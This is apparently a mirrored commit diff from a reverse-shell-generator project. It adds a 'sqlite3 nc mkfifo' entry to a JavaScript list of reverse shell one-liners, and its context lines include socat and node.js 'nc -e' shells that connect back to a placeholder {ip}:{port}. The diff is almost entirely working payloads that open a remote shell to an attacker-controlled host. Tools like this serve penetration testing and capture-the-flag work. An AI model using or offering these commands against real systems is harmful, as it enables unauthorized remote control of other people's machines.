mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
Merge pull request #134 from 0Magenta0/main
This commit is contained in:
commit
3b38721bba
@ -275,6 +275,11 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "socat TCP:{ip}:{port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "sqlite3 nc mkfifo",
|
||||
"command": "sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f'",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "node.js",
|
||||
"command": "require('child_process').exec('nc -e {shell} {ip} {port}')",
|
||||
|
Loading…
Reference in New Issue
Block a user